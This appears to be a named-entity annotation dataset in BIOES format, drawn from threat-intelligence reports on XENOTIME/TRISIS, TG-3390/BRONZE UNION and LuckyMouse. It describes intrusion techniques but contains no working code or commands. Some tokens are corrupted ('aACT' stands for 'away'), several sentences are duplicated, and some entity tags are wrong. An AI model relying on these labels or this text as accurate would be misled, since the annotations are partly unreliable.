O + +Targeting O +a O +safety O +system O +indicates O +significant O +damage O +and O +loss O +of O +human O +life O +were O +either O +intentional O +or O +acceptable O +goals O +of O +the O +attack O +, O +a O +consequence O +not O +seen O +in O +previous O +disruptive O +attacks O +such O +as O +the O +2016 S-TIME +CRASHOVERRIDE S-MAL +malware S-MAL +that O +caused O +a O +power O +loss O +in O +Ukraine S-LOC +. O + +XENOTIME S-APT +used O +credential B-MAL +capture I-MAL +and I-MAL +replay E-MAL +to O +move O +between O +networks O +, O +Windows S-OS +commands O +, O +standard O +command-line O +tools O +such O +as O +PSExec S-MAL +, O +and O +proprietary O +tools O +for O +operations O +on O +victim O +hosts O +. O + +Dragos' S-SECTEAM +data O +indicates O +XENOTIME S-APT +remains O +active O +. O + +TEMP.Veles S-APT +created O +a O +custom S-MAL +malware S-MAL +framework O +and O +tailormade B-MAL +credential I-MAL +gathering I-MAL +tools E-MAL +, O +but O +an O +apparent O +misconfiguration O +prevented O +the O +attack O +from O +executing O +properly O +. O + +Furthermore O +, O +Dragos' S-SECTEAM +analysis O +of O +the O +TRISIS S-MAL +event O +continues O +as O +we O +recover O +additional O +data O +surrounding O +the O +incident O +. O + +XENOTIME S-APT +operates O +globally O +, O +impacting O +regions O +far O +outside O +of O +the O +Middle B-LOC +East E-LOC +, O +their O +initial O +target O +. O + +Intelligence O +suggests O +the O +group O +has O +been O +active O +since O +at O +least O +2014 S-TIME +and O +is O +presently O +operating O +in O +multiple O +facilities O +targeting O +safety O +systems O +beyond O +Triconex O +. O + +Dragos S-SECTEAM +instead O +focuses O +on O +threat O +behaviors O +and O +appropriate O +detection O +and O +response O +. 
O + +Dragos S-SECTEAM +assesses O +with O +moderate O +confidence O +that O +XENOTIME S-APT +intends O +to O +establish O +required O +access O +and O +capability O +to O +cause O +a O +potential O +, O +future O +disruptive—or O +even O +destructive—event O +. O + +However O +, O +full O +details O +on O +XENOTIME S-APT +and O +other O +group O +tools O +, O +techniques O +, O +procedures O +, O +and O +infrastructure O +is O +available O +to O +network O +defenders O +via O +Dragos B-SECTEAM +WorldView E-SECTEAM +. O + +This O +seems O +confusing O +as O +FireEye S-SECTEAM +earlier O +publicly O +declared O +the O +TRITON S-MAL +as O +a O +discrete O +entity O +, O +linked O +to O +a O +Russian S-LOC +research B-IDTY +institution E-IDTY +, O +and O +christened O +it O +as O +" O +TEMP.Veles S-APT +" O +. O + +This O +seems O +confusing O +as O +FireEye S-SECTEAM +earlier O +publicly O +declared O +the O +" O +TRITON S-MAL +actor O +" O +as O +a O +discrete O +entity O +, O +linked O +to O +a O +Russian S-LOC +research B-IDTY +institution E-IDTY +, O +and O +christened O +it O +as O +" O +TEMP.Veles S-APT +" O +. O + +Meanwhile O +, O +parallel O +work O +at O +Dragos S-SECTEAM +( O +my O +employer O +, O +where O +I O +have O +performed O +significant O +work O +on O +the O +activity O +described O +above O +) O +uncovered O +similar O +conclusions O +concerning O +TTPs O +and O +behaviors O +, O +for O +both O +the O +2017 S-TIME +event O +and O +subsequent O +activity O +in O +other O +industrial B-IDTY +sectors E-IDTY +. O + +FireEye S-SECTEAM +recently O +published O +a O +blog O +covering O +the O +tactics O +, O +techniques O +, O +and O +procedures O +( O +TTPs O +) O +for O +the O +" O +TRITON S-MAL +actor O +" O +when O +preparing O +to O +deploy O +the O +TRITON/TRISIS S-MAL +malware S-MAL +framework O +in O +2017 S-TIME +. 
O + +Based O +on O +information O +gained O +from O +discussion O +with O +the O +initial O +TRITON/TRISIS S-MAL +responders O +and O +subsequent O +work O +on O +follow-on O +activity O +by O +this O +entity O +, O +Dragos S-SECTEAM +developed O +a O +comprehensive O +( O +public O +) O +picture O +of O +adversary O +activity O +roughly O +matching O +FireEye S-SECTEAM +'s O +analysis O +published O +in O +April B-TIME +2019 E-TIME +, O +described O +in O +various O +media S-IDTY +. O + +Since O +late O +2018 S-TIME +, O +based O +upon O +the O +most-recent O +posting O +, O +FireEye S-SECTEAM +appears O +to O +have O +" O +walked O +back O +" O +the O +previously-used O +terminology O +of O +TEMP.Veles S-APT +and O +instead O +refers O +rather O +cryptically O +to O +the O +" O +TRITON S-MAL +actor O +" O +, O +while O +Dragos S-SECTEAM +leveraged O +identified O +behaviors O +to O +consistently O +refer O +to O +an O +activity O +group O +, O +XENOTIME S-APT +. O + +Dragos S-SECTEAM +leveraged O +identified O +behaviors O +to O +consistently O +refer O +to O +an O +activity O +group O +, O +XENOTIME S-APT +. O + +Aside O +from O +the O +competitive O +vendor O +naming O +landscape O +( O +which O +I O +am O +not O +a O +fan O +of O +in O +cases O +on O +direct O +overlap O +, O +but O +which O +has O +more O +to O +say O +for O +itself O +when O +different O +methodologies O +are O +employed O +around O +similar O +observations O +) O +, O +the O +distinction O +between O +FireEye S-SECTEAM +and O +Dragos' S-SECTEAM +approaches O +with O +respect O +to O +the O +" O +TRITON S-MAL +actor O +" O +comes O +down O +to O +fundamental O +philosophical O +differences O +in O +methodology O +. O + +In O +the O +2018 S-TIME +public O +posting O +announcing O +TEMP.Veles S-APT +, O +FireEye S-SECTEAM +researchers O +noted O +that O +the O +institute O +in O +question O +at O +least O +supported O +TEMP.Veles B-APT +activity E-ACT +in O +deploying O +TRITON S-MAL +. 
O + +My O +understanding O +is O +FireEye S-SECTEAM +labels O +entities O +where O +definitive O +attribution O +is O +not O +yet O +possible O +with O +the O +" O +TEMP S-APT +" O +moniker O +( O +hence O +, O +TEMP.Veles S-APT +) O +– O +yet O +in O +this O +case O +FireEye S-SECTEAM +developed O +and O +deployed O +the O +label O +, O +then O +appeared O +to O +move O +aACT O +from O +it O +in O +subsequent O +reporting O +. O + +In O +comparison O +, O +XENOTIME S-APT +was O +defined O +based O +on O +principles O +of O +infrastructure O +( O +compromised O +third-party O +infrastructure O +and O +various O +networks O +associated O +with O +several O +Russian S-LOC +research B-IDTY +institutions E-IDTY +) O +, O +capabilities O +( O +publicly- O +and O +commercially-available O +tools O +with O +varying O +levels O +of O +customization O +) O +and O +targeting O +( O +an O +issue O +not O +meant O +for O +discussion O +in O +this O +blog O +) O +. O + +Of O +note O +, O +this O +methodology O +of O +naming O +abstracts O +aACT O +the O +" O +who O +" O +element O +– O +XENOTIME S-APT +may O +represent O +a O +single O +discrete O +entity O +( O +such O +as O +a O +Russian S-LOC +research B-IDTY +institution E-IDTY +) O +or O +several O +entities O +working O +in O +coordination O +in O +a O +roughly O +repeatable O +, O +similar O +manner O +across O +multiple O +events O +. O + +Much O +like O +the O +observers O +watching O +the O +shadows O +of O +objects O +cast O +upon O +the O +wall O +of O +the O +cave O +, O +these O +two O +definitions O +( O +XENOTIME S-APT +and O +TEMP.Veles S-APT +, O +both O +presumably O +referring O +to O +" O +the O +TRITON S-APT +actor O +" O +) O +describe O +the O +same O +phenomena O +, O +yet O +at O +the O +same O +time O +appear O +different O +. 
O + +To O +better O +understand O +how O +the O +adversary O +was O +operating O +and O +what O +other O +actions O +they O +had O +performed O +, O +CTU S-SECTEAM +researchers O +examined O +cmd.exe S-FILE +and O +its O +supporting O +processes O +to O +uncover O +additional O +command O +line O +artifacts O +. O + +CTU S-SECTEAM +researchers O +assess O +with O +high O +confidence O +that O +threat O +groups O +like O +Threat B-APT +Group-1314 E-APT +will O +continue O +to O +live O +off O +of O +the O +land O +to O +avoid O +detection O +and O +conduct O +their O +operations O +. O + +Analysis O +of O +TG-3390 S-APT +'s O +operations O +, O +targeting O +, O +and O +tools O +led O +CTU S-SECTEAM +researchers O +to O +assess O +with O +moderate O +confidence O +the O +group O +is O +located O +in O +the O +People's B-IDTY +Republic E-IDTY +of O +China S-LOC +. O + +The O +threat O +actors O +target O +a O +wide O +range O +of O +organizations O +: O +CTU S-SECTEAM +researchers O +have O +observed O +TG-3390 S-APT +actors O +obtaining O +confidential O +data O +on O +defense O +manufacturing O +projects O +, O +but O +also O +targeting O +other O +industry O +verticals O +and O +attacking O +organizations O +involved O +in O +international O +relations O +. O + +In O +comparison O +to O +other O +threat O +groups O +, O +TG-3390 S-APT +is O +notable O +for O +its O +tendency O +to O +compromise O +Microsoft S-IDTY +Exchange O +servers O +using O +a O +custom B-MAL +backdoor E-MAL +and O +credential B-MAL +logger E-MAL +. O + +CTU S-SECTEAM +researchers O +have O +evidence O +that O +the O +TG-3390 S-APT +compromised O +U.S. 
O +and O +UK O +organizations O +in O +the O +following O +verticals O +: O +manufacturing S-IDTY +( O +specifically O +aerospace S-IDTY +( O +including O +defense B-IDTY +contractors E-IDTY +) O +, O +automotive S-IDTY +, O +technology S-IDTY +, O +energy S-IDTY +, O +and O +pharmaceuticals S-IDTY +) O +, O +education S-IDTY +, O +and O +legal S-IDTY +, O +as O +well O +as O +organizations O +focused O +on O +international O +relations O +. O + +Based O +on O +analysis O +of O +the O +group O +'s O +SWCs S-MAL +, O +TG-3390 S-APT +operations O +likely O +affect O +organizations O +in O +other O +countries O +and O +verticals O +. O + +TG-3390 S-APT +operates O +a O +broad O +and O +long-running O +campaign O +of O +SWCs S-ACT +and O +has O +compromised O +approximately O +100 O +websites O +as O +of O +this O +publication O +. O + +CTU S-SECTEAM +researchers O +have O +evidence O +that O +the O +threat O +group O +compromised O +U.S. O +and O +UK O +organizations O +in O +the O +following O +verticals O +: O +manufacturing S-IDTY +( O +specifically O +aerospace S-IDTY +( O +including O +defense B-IDTY +contractors E-IDTY +) O +, O +automotive S-IDTY +, O +technology S-IDTY +, O +energy S-IDTY +, O +and O +pharmaceuticals S-IDTY +) O +, O +education S-IDTY +, O +and O +legal S-IDTY +, O +as O +well O +as O +organizations O +focused O +on O +international O +relations O +. O + +Like O +many O +threat O +groups O +, O +TG-3390 S-APT +conducts O +strategic B-ACT +web I-ACT +compromises E-ACT +( O +SWCs S-ACT +) O +, O +also O +known O +as O +watering B-ACT +hole I-ACT +attacks E-ACT +, O +on O +websites O +associated O +with O +the O +target O +organization O +'s O +vertical O +or O +demographic O +to O +increase O +the O +likelihood O +of O +finding O +victims O +with O +relevant O +information O +. 
O + +Through O +an O +IP B-ACT +address I-ACT +whitelisting I-ACT +process E-ACT +, O +the O +threat O +group O +selectively O +targets O +visitors O +to O +these O +websites O +. O + +After O +the O +initial O +compromise O +, O +TG-3390 S-APT +delivers O +the O +HTTPBrowser B-MAL +backdoor E-MAL +to O +its O +victims O +. O + +CTU S-SECTEAM +researchers O +assess O +with O +high O +confidence O +that O +TG-3390 S-APT +uses O +information O +gathered O +from O +prior O +reconnaissance O +activities S-ACT +to O +selectively O +compromise O +users O +who O +visit O +websites O +under O +its O +control O +. O + +TG-3390 S-APT +uses O +the O +PlugX B-MAL +remote I-MAL +access I-MAL +tool E-MAL +. O + +The O +SWC S-ACT +of O +a O +Uyghur O +cultural O +website O +suggests O +intent O +to O +target O +the O +Uyghur B-IDTY +ethnic I-IDTY +group E-IDTY +, O +a O +Muslim B-IDTY +minority I-IDTY +group E-IDTY +primarily O +found O +in O +the O +Xinjiang S-LOC +region O +of O +China O +. O + +The O +threat O +actors O +have O +used O +the O +Baidu B-MAL +search I-MAL +engine E-MAL +, O +which O +is O +only O +available O +in O +Chinese S-LOC +, O +to O +conduct O +reconnaissance O +activities S-ACT +. O + +Recently O +, O +CTU S-SECTEAM +researchers O +responded O +to O +an O +intrusion O +perpetrated O +by O +Threat B-APT +Group-1314 E-APT +, O +one O +of O +numerous O +threat O +groups O +that O +employ O +the O +" O +living B-ACT +off I-ACT +the I-ACT +land E-ACT +" O +technique O +to O +conduct O +their O +intrusions O +. O + +CTU S-SECTEAM +researchers O +have O +observed O +the O +Threat O +Group-3390 S-APT +obtaining O +information O +about O +specific O +U.S. B-IDTY +defense E-IDTY +projects O +that O +would O +be O +desirable O +to O +those O +operating O +within O +a O +country O +with O +a O +manufacturing O +base O +, O +an O +interest O +in O +U.S. S-LOC +military B-IDTY +capability E-IDTY +, O +or O +both O +. 
O + +CTU S-SECTEAM +researchers O +have O +observed O +the O +threat O +group O +obtaining O +information O +about O +specific O +U.S. B-IDTY +defense E-IDTY +projects O +that O +would O +be O +desirable O +to O +those O +operating O +within O +a O +country O +with O +a O +manufacturing O +base O +, O +an O +interest O +in O +U.S. S-LOC +military B-IDTY +capability E-IDTY +, O +or O +both O +. O + +TG-3390 S-APT +can O +quickly O +leverage O +compromised O +network B-ACT +infrastructure E-ACT +during O +an O +operation O +and O +can O +conduct O +simultaneous O +intrusions O +into O +multiple O +environments O +. O + +Malware S-MAL +used O +by O +the O +threat O +group O +can O +be O +configured O +to O +bypass O +network-based O +detection O +; O +however O +, O +the O +threat O +actors O +rarely O +modify O +host-based O +configuration O +settings O +when O +deploying O +payloads O +. O + +TG-3390 S-APT +uses O +older O +exploits O +to O +compromise O +targets O +, O +and O +CTU S-SECTEAM +researchers O +have O +not O +observed O +the O +threat O +actors O +using O +zero-day S-VULNAME +exploits O +as O +of O +this O +publication O +. O + +In O +addition O +to O +using O +SWCs S-MAL +to O +target O +specific O +types O +of O +organizations O +, O +TG-3390 S-APT +uses O +spearphishing B-ACT +emails S-TOOL +to O +target O +specific O +victims O +. O + +After O +gaining O +access O +to O +a O +target O +network O +in O +one O +intrusion O +analyzed O +by O +CTU S-SECTEAM +researchers O +, O +TG-3390 S-APT +actors O +identified O +and O +exfiltrated O +data O +for O +specific O +projects O +run O +by O +the O +target O +organization O +, O +indicating O +that O +they O +successfully O +obtained O +the O +information O +they O +sought O +. 
O + +Based O +on O +this O +information O +, O +CTU S-SECTEAM +researchers O +assess O +that O +TG-3390 S-APT +aims O +to O +collect O +defense O +technology O +and O +capability O +intelligence O +, O +other O +industrial O +intelligence O +, O +and O +political B-IDTY +intelligence E-IDTY +from O +governments S-IDTY +and O +NGOs E-IDTY +. O + +Incident O +response O +engagements O +have O +given O +CTU S-SECTEAM +researchers O +insight O +into O +the O +tactics O +TG-3390 S-APT +employs O +during O +intrusions O +. O + +CTU S-SECTEAM +researchers O +have O +not O +observed O +TG-3390 S-APT +actors O +performing O +reconnaissance O +prior O +to O +compromising B-IDTY +organizations E-IDTY +. O + +CTU S-SECTEAM +researchers O +have O +observed O +the O +threat O +actors O +installing O +a O +credential B-MAL +logger E-MAL +and O +backdoor O +on O +Microsoft S-IDTY +Exchange O +servers O +, O +which O +requires O +a O +technical O +grasp O +of O +Internet B-TOOL +Information I-TOOL +Services E-TOOL +( O +IIS S-TOOL +) O +. O + +TG-3390 S-APT +is O +capable O +of O +using O +a O +C2 B-ACT +infrastructure E-ACT +that O +spans O +multiple O +networks O +and O +registrars O +. O + +TG-3390 S-APT +SWCs O +may O +be O +largely O +geographically O +independent O +, O +but O +the O +group O +'s O +most O +frequently O +used O +C2 S-TOOL +registrars O +and O +IP S-PROT +net O +blocks O +are O +located O +in O +the O +U.S S-LOC +. O + +Using O +a O +U.S. S-LOC +based O +C2 S-TOOL +infrastructure O +to O +compromise O +targets O +in O +the O +U.S. S-LOC +helps O +TG-3390 S-APT +actors O +avoid O +geo-blocking O +and O +geo-flagging O +measures O +used O +in O +network O +defense O +. O + +The O +threat O +actors O +create O +PlugX B-MAL +DLL E-MAL +stub O +loaders O +that O +will O +run O +only O +after O +a O +specific O +date O +. 
O + +The O +compile O +dates O +of O +the O +samples O +analyzed O +by O +CTU S-SECTEAM +researchers O +are O +all O +later O +than O +the O +hard-coded O +August B-TIME +8 E-TIME +, O +2013 S-TIME +date O +, O +indicating O +that O +the O +code O +might O +be O +reused O +from O +previous O +tools O +. O + +One O +archive O +sample O +analyzed O +by O +CTU S-SECTEAM +researchers O +contained O +a O +legitimate O +PDF B-MAL +file E-MAL +, O +a O +benign O +image O +of O +interest O +to O +targets O +( O +see O +Figure O +8 O +) O +, O +and O +an O +HTTPBrowser B-MAL +installer E-MAL +disguised O +as O +an O +image O +file O +. O + +CTU S-SECTEAM +researchers O +have O +observed O +TG-3390 B-ACT +activity E-ACT +between O +04:00 B-TIME +and I-TIME +09:00 E-TIME +UTC O +, O +which O +is O +12:00 B-TIME +to I-TIME +17:00 E-TIME +local O +time O +in O +China S-LOC +( O +UTC O ++8 O +) O +. O + +TG-3390 S-APT +sends O +spearphishing B-ACT +emails S-TOOL +with O +ZIP O +archive O +attachments O +. O + +CTU S-SECTEAM +researchers O +have O +observed O +TG-3390 S-APT +compromising O +a O +target O +organization O +'s O +externally O +and O +internally O +accessible O +assets O +, O +such O +as O +an O +OWA O +server O +, O +and O +adding B-ACT +redirect I-ACT +code E-ACT +to O +point O +internal O +users O +to O +an O +external O +website O +that O +hosts O +an O +exploit S-VULNAME +and O +delivers O +malware O +. O + +TG-3390 S-APT +actors O +have O +used O +Java S-TOOL +exploits O +in O +their O +SWCs S-MAL +. 
O + +In O +particular O +, O +TG-3390 S-APT +has O +exploited O +CVE-2011-3544 S-VULID +, O +a O +vulnerability O +in O +the O +Java O +Runtime O +Environment O +, O +to O +deliver O +the O +HTTPBrowser B-MAL +backdoor E-MAL +; O +and O +CVE-2010-0738 S-VULID +, O +a O +vulnerability O +in O +JBoss S-MAL +, O +to O +compromise O +internally O +and O +externally O +accessible O +assets O +used O +to O +redirect O +users' O +web O +browsers O +to O +exploit S-VULNAME +code O +. O + +In O +activity O +analyzed O +by O +CTU S-SECTEAM +researchers O +, O +TG-3390 S-APT +executed O +the O +Hunter B-MAL +web I-MAL +application I-MAL +scanning I-MAL +tool E-MAL +against O +a O +target O +server O +running O +IIS S-TOOL +. O + +In O +particular O +, O +the O +threat O +actors O +have O +exploited O +CVE-2011-3544 S-VULID +, O +a O +vulnerability O +in O +the O +Java O +Runtime O +Environment O +, O +to O +deliver O +the O +HTTPBrowser B-MAL +backdoor E-MAL +; O +and O +CVE-2010-0738 S-VULID +, O +a O +vulnerability O +in O +JBoss S-MAL +, O +to O +compromise O +internally O +and O +externally O +accessible O +assets O +used O +to O +redirect O +users' O +web O +browsers O +to O +exploit S-VULNAME +code O +. O + +TG-3390 S-APT +uses O +DLL B-ACT +side I-ACT +loading E-ACT +, O +a O +technique O +that O +involves O +running O +a O +legitimate O +, O +typically O +digitally O +signed O +, O +program O +that O +loads O +a O +malicious O +DLL S-TOOL +. O + +CTU S-SECTEAM +researchers O +have O +observed O +the O +Threat B-APT +Group-3390 E-APT +employing O +legitimate O +Kaspersky S-SECTEAM +antivirus O +variants O +in O +analyzed O +samples O +. O + +The O +adversaries O +have O +used O +this O +technique O +to O +allow O +PlugX S-MAL +and O +HTTPBrowser S-MAL +to O +persist O +on O +a O +system O +. O + +CTU S-SECTEAM +researchers O +have O +observed O +the O +TG-3390 S-APT +employing O +legitimate O +Kaspersky S-SECTEAM +antivirus O +variants O +in O +analyzed O +samples O +. 
O + +TG-3390 S-APT +actors O +have O +deployed O +the O +OwaAuth B-MAL +web I-MAL +shell E-MAL +to O +Exchange O +servers O +, O +disguising O +it O +as O +an O +ISAPI O +filter O +. O + +In O +other O +cases O +, O +threat O +actors O +placed O +web B-MAL +shells E-MAL +on O +externally O +accessible O +servers O +, O +sometimes O +behind O +a O +reverse O +proxy O +, O +to O +execute O +commands O +on O +the O +compromised O +system O +. O + +CTU S-SECTEAM +researchers O +have O +discovered O +numerous O +details O +about O +TG-3390 S-APT +operations O +, O +including O +how O +the O +adversaries O +explore O +a O +network O +, O +move O +laterally O +, O +and O +exfiltrate O +data O +. O + +When O +the O +adversaries' O +operations O +are O +live O +, O +they O +modify O +the O +record O +again O +to O +point O +the O +C2 S-TOOL +domain O +to O +an O +IP S-PROT +address O +they O +can O +access O +. O + +They O +then O +identify O +the O +Exchange O +server O +and O +attempt O +to O +install O +the O +OwaAuth B-MAL +web I-MAL +shell E-MAL +. O + +If O +the O +OwaAuth B-MAL +web I-MAL +shell E-MAL +is O +ineffective O +because O +the O +victim O +uses O +two-factor O +authentication O +for O +webmail O +, O +TG-3390 S-APT +identify O +other O +externally O +accessible O +servers O +and O +deploy O +ChinaChopper B-ACT +web I-ACT +shells E-ACT +. O + +After O +compromising O +an O +initial O +victim O +'s O +system O +( O +patient O +0 O +) O +, O +the O +threat O +actors O +use O +the O +Baidu B-MAL +search I-MAL +engine E-MAL +to O +search O +for O +the O +victim O +'s O +organization O +name O +. O + +CTU S-SECTEAM +researchers O +discovered O +the O +threat O +actors O +searching O +for O +" O +[company] O +login O +" O +, O +which O +directed O +them O +to O +the O +landing O +page O +for O +remote O +access O +. 
O + +TG-3390 S-APT +actors O +keep O +track O +of O +and O +leverage O +existing O +ASPXTool B-MAL +web I-MAL +shells E-MAL +in O +their O +operations O +, O +preferring O +to O +issue O +commands O +via O +an O +internally O +accessible O +Web B-TOOL +shell E-TOOL +rather O +than O +HTTPBrowser S-MAL +or O +PlugX S-MAL +. O + +Within O +six O +hours O +of O +entering O +the O +environment O +, O +the O +threat O +actors O +compromised O +multiple O +systems O +and O +stole O +credentials O +for O +the O +entire O +domain O +. O + +Despite O +multiple O +public O +disclosures O +of O +their O +activities S-ACT +, O +BRONZE O +UNION O +remains O +an O +active O +and O +formidable O +threat O +as O +of O +this O +publication O +. O + +In O +2015 S-TIME +, O +the O +SecureWorks® B-SECTEAM +Counter I-SECTEAM +Threat I-SECTEAM +Unit™ E-SECTEAM +( O +CTU S-SECTEAM +) O +research O +team O +documented O +the O +BRONZE O +UNION O +threat O +group O +( O +formerly O +labeled O +TG-3390 S-APT +) O +, O +which O +CTU™ S-SECTEAM +analysis O +suggests O +is O +based O +in O +the O +People's B-IDTY +Republic I-IDTY +of I-IDTY +China E-IDTY +( O +PRC S-IDTY +) O +. O + +After O +reestablishing O +access O +, O +the O +adversaries O +download O +tools O +such O +as O +gsecudmp S-MAL +and O +WCE S-MAL +that O +are O +staged O +temporarily O +on O +websites O +that O +TG-3390 S-APT +previously O +compromised O +but O +never O +used O +. O + +In O +2015 S-TIME +, O +the O +SecureWorks S-SECTEAM +documented O +the O +BRONZE B-APT +UNION E-APT +threat O +group O +( O +formerly O +labeled O +TG-3390 S-APT +) O +, O +which O +CTU S-SECTEAM +analysis O +suggests O +is O +based O +in O +the O +People's B-IDTY +Republic E-IDTY +of O +China S-LOC +( O +PRC E-IDTY +) O +. O + +BRONZE B-ACT +UNION I-ACT +threat I-ACT +campaigns E-ACT +that O +illustrate O +the O +evolution O +of O +the O +group O +'s O +methods O +and O +espionage O +objectives O +. 
O + +Based O +on O +BRONZE O +UNION O +'s O +targeting O +activity O +, O +CTU S-SECTEAM +researchers O +assess O +it O +is O +highly O +likely O +that O +the O +group O +focuses O +on O +political S-IDTY +and O +defense B-IDTY +organization E-IDTY +networks O +. O + +this O +SWC S-ACT +was O +used O +to O +specifically O +target O +Turkish O +. O + +In O +2016 S-TIME +, O +the O +threat O +actors O +conducted O +a O +strategic B-ACT +web I-ACT +compromise E-ACT +( O +SWC S-ACT +) O +on O +the O +website O +of O +an O +international B-IDTY +industry I-IDTY +organization E-IDTY +that O +affected O +aerospace S-IDTY +, O +academic S-IDTY +, O +media S-IDTY +, O +technology S-IDTY +, O +government S-IDTY +, O +and O +utilities B-IDTY +organizations E-IDTY +around O +the O +world O +. O + +In O +addition O +, O +BRONZE B-ACT +UNION I-ACT +activity E-ACT +on O +multiple O +U.S.-based B-IDTY +defense E-IDTY +manufacturer O +networks O +included O +the O +threat O +actors O +seeking O +information O +associated O +with O +aerospace B-IDTY +technologies E-IDTY +, O +combat B-IDTY +processes E-IDTY +, O +and O +naval B-IDTY +defense I-IDTY +systems E-IDTY +. O + +this O +SWC S-ACT +was O +used O +to O +specifically O +target O +Turkish B-LOC +goverment E-LOC +. O + +Since O +that O +analysis O +, O +CTU S-SECTEAM +researchers O +have O +observed O +multiple O +BRONZE B-ACT +UNION I-ACT +threat I-ACT +campaigns E-ACT +that O +illustrate O +the O +evolution O +of O +the O +group O +'s O +methods O +and O +espionage O +objectives O +. O + +this O +SWC S-ACT +was O +used O +to O +specifically O +target O +Turkish O +banking S-IDTY +. O + +this O +SWC S-ACT +was O +used O +to O +specifically O +target O +Turkish B-LOC +academic I-LOC +networks E-LOC +. O + +BRONZE O +UNION O +has O +consistently O +demonstrated O +the O +capability O +to O +conduct O +successful O +large-scale O +intrusions O +against O +high-profile O +networks O +and O +systems O +. 
O + +The O +threat O +actors O +appear O +to O +be O +able O +to O +create O +and O +leverage O +multiple O +SWCs S-MAL +in O +parallel O +. O + +In O +a O +separate O +incident O +, O +CTU S-SECTEAM +researchers O +identified O +a O +file O +named O +s.txt S-FILE +, O +which O +is O +consistent O +with O +the O +output O +of O +the O +Netview O +host-enumeration O +tool O +. O + +BRONZE O +UNION O +actors O +leveraged O +initial O +web B-ACT +shell E-ACT +access O +on O +Internet-facing O +systems O +to O +conduct O +internal O +reconnaissance O +. O + +BRONZE O +UNION O +appears O +to O +use O +a O +combination O +of O +self-registered O +IP S-PROT +addresses O +and O +commercial O +VPN S-TOOL +services O +in O +its O +command O +and O +control O +( O +C2 S-TOOL +) O +and O +operational O +infrastructure O +. O + +This O +script O +relays O +commands O +and O +output O +between O +the O +controller O +and O +the O +system O +. O + +The O +threat O +actors O +used O +the O +appcmd O +command-line O +tool O +to O +unlock O +and O +disable O +the O +default O +logging O +component O +on O +the O +server O +( O +systsm.webServer/httplogging S-TOOL +) O +and O +then O +delete O +existing O +logs O +from O +the O +system O +( O +see O +Figure O +4 O +) O +. O + +In O +2016 S-TIME +, O +CTU S-SECTEAM +researchers O +observed O +the O +group O +using O +native O +system O +. O + +In O +March B-TIME +2018 E-TIME +we O +detected O +an O +ongoing O +campaign O +. O + +TG-3390 O +'s O +activities S-ACT +indicate O +a O +preference O +for O +leveraging B-ACT +SWCs E-ACT +and O +scan-and-exploit B-ACT +techniques E-ACT +to O +compromise O +target O +systems O +. O + +As O +of O +this O +publication O +, O +BRONZE O +UNION O +remains O +a O +formidable O +threat O +group O +that O +targets O +intellectual O +property O +and O +executes O +its O +operations O +at O +a O +swift O +pace O +. 
O + +we O +detected O +an O +ongoing O +campaign O +targeting O +a O +national O +data O +center O +. O + +The O +operators O +used O +the O +HyperBro B-MAL +Trojan E-MAL +as O +their O +last-stage O +in-memory O +remote B-MAL +administration I-MAL +tool E-MAL +( O +RAT S-MAL +) O +. O + +we O +detected O +an O +ongoing O +campaign O +targeting O +a O +national O +data O +center O +in O +the O +Centeral B-LOC +Asia E-LOC +. O + +The O +tools O +found O +in O +this O +campaign O +, O +such O +as O +the O +HyperBro B-MAL +Trojan E-MAL +, O +are O +regularly O +used O +by O +a O +variety O +of O +Chinese-speaking S-LOC +actors O +. O + +Due O +to O +tools O +and O +tactics O +in O +use O +we O +attribute O +the O +campaign O +to O +LuckyMouse S-APT +Chinese-speaking O +actor O +( O +also O +known O +as O +EmissaryPanda S-APT +and O +APT27 S-APT +) O +. O + +It's O +possible O +TG-3390 S-APT +used O +a O +waterhole S-ACT +to O +infect O +data B-IDTY +center I-IDTY +employees E-IDTY +. O + +Even O +when O +we O +observed O +LuckyMouse O +using O +weaponized O +documents O +with O +CVE-2017-11882 S-VULID +( O +Microsoft B-MAL +Office I-MAL +Equation I-MAL +Editor E-MAL +, O +widely O +used O +by O +Chinese-speaking O +actors O +since O +December B-TIME +2017 E-TIME +) O +, O +we O +can′t O +prove O +they O +were O +related O +to O +this O +particular O +attack O +. O + +We O +suspect O +this O +router S-MAL +was O +hacked O +as O +part O +of O +the O +campaign O +in O +order O +to O +process O +the O +malware O +'s O +HTTP S-PROT +requests O +. O + +In O +March B-TIME +2017 E-TIME +, O +Wikileaks S-SECTEAM +published O +details O +about O +an O +exploit S-VULNAME +affecting O +Mikrotik S-MAL +called O +ChimayRed S-MAL +. O + +There O +were O +traces O +of O +HyperBro S-MAL +in O +the O +infected O +data O +center O +from O +mid-November B-TIME +2017 E-TIME +. 
O + +In O +March B-TIME +2017 E-TIME +, O +Wikileaks S-SECTEAM +published O +details O +about O +an O +exploit S-VULNAME +affecting O +Mikrotik S-MAL +called O +ChimayRed S-MAL +. O + +This O +is O +a O +hacking O +group O +with O +Chinese B-LOC +origins E-LOC +which O +targets O +selected O +organisations O +related O +with O +education S-IDTY +, O +energy S-IDTY +and O +technology S-IDTY +. O + +Usually O +, O +the O +delivered O +payload O +is O +either O +the O +well-known O +' O +PlugX S-MAL +' O +or O +' O +HTTPBrowser S-MAL +' O +RAT S-MAL +, O +a O +tool O +which O +is O +believed O +to O +have O +Chinese B-LOC +origins E-LOC +and O +to O +be O +used O +only O +by O +certain O +Chinese B-LOC +hacking I-LOC +groups E-LOC +. O + +Emissary O +Panda O +has O +used O +many O +ACTs O +with O +the O +most O +notable O +being O +the O +exploits O +from O +the O +Hacking O +Team O +leak O +. O + +Emissary O +Panda O +is O +still O +active O +and O +continues O +to O +target O +selected O +organisations O +. O + +Cybersecurity S-SECTEAM +researchers O +have O +uncovered O +an O +espionage B-ACT +campaign E-ACT +that O +has O +targeted O +a O +national O +data O +center O +of O +an O +unnamed O +central B-LOC +Asian E-LOC +country O +in O +order O +to O +conduct O +watering B-ACT +hole I-ACT +attacks E-ACT +. O + +The O +campaign O +is O +believed O +to O +be O +active O +covertly O +since O +fall O +2017 S-TIME +. O + +LuckyMouse S-APT +, O +also O +known O +as O +Iron B-APT +Tiger E-APT +, O +EmissaryPanda S-APT +, O +APT B-APT +27 E-APT +and O +Threat B-APT +Group-3390 E-APT +, O +is O +the O +same O +group O +of O +Chinese B-LOC +hackers E-LOC +who O +was O +found O +targeting O +Asian B-LOC +countries E-LOC +with O +Bitcoin B-MAL +mining I-MAL +malware E-MAL +early O +this O +year O +. O + +March S-TIME +by O +security O +researchers O +from O +Kaspersky B-SECTEAM +Labs E-SECTEAM +. 
